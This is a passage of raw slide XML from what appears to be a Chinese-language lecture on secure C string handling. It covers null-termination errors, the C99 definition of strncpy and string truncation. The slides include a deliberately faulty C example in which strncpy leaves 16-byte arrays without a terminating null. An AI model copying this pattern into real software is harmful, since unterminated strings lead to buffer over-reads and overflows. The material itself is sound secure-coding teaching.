              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>] = '\0';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 9.   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> = %s", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>10. }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="920456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dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>、空结尾错误</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>当使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>风格字符时，另一个常见的问题是字符串末尾没有正确的空字符。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="693738" lvl="2" indent="-241300" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="1800" b="1" noProof="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>int main(int argc, char* argv[]) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="693738" lvl="2" indent="-241300" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="1800" b="1" noProof="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>char a[16];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="693738" lvl="2" indent="-241300" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="1800" b="1" noProof="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>char b[16];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="693738" lvl="2" indent="-241300" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="1800" b="1" noProof="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>char c[32];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="693738" lvl="2" indent="-241300" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800" b="1" noProof="1">
              <a:latin typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="693738" lvl="2" indent="-241300" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="1800" b="1" noProof="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>strncpy(a, "0123456789abcdef", sizeof(a));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="693738" lvl="2" indent="-241300" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="1800" b="1" noProof="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>strncpy(b, "0123456789abcdef", sizeof(b));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="693738" lvl="2" indent="-241300" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="1800" b="1" noProof="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>strncpy(c, a, sizeof(c));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="693738" lvl="2" indent="-241300" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr altLang="zh-CN" sz="1800" b="1" noProof="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="434180" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3963988" y="3332163"/>
            <a:ext cx="3789362" cy="808037"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -21176"/>
              <a:gd name="adj2" fmla="val 71417"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFCC"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>a[]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>b[]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>都没有正确地结尾</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2998362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4180"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="434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dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>注意</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5123" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>在书中提出的想法是通用的，但特定于实例：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Microsoft Visual Studio</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Linux/GCC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>32-bit Intel Architecture (IA-32)</a:t>
            </a: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2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="612312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a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>来自</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>ISO/IEC 9899:1999</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17411" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" b="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strncpy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" b="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>函数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2500">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>char *strncpy(char * restrict s1,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>		const char * restrict s2,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>		size_t n);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>从数组</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>S2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>中复制不超过 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>个字符串</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>空字符后的字符不会被复制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>到目标数组</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>S1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>中。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" baseline="30000">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>因此，如果第一个数组</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>S2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>中的前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>个字符中不存在空字符，那么其结果字符串将不会是以空字符结尾的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="200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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="173617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dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>、字符串截断</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18435" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539552" y="2128838"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>一些限制字节数的函数通常用来防止缓冲区溢出漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" b="1" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
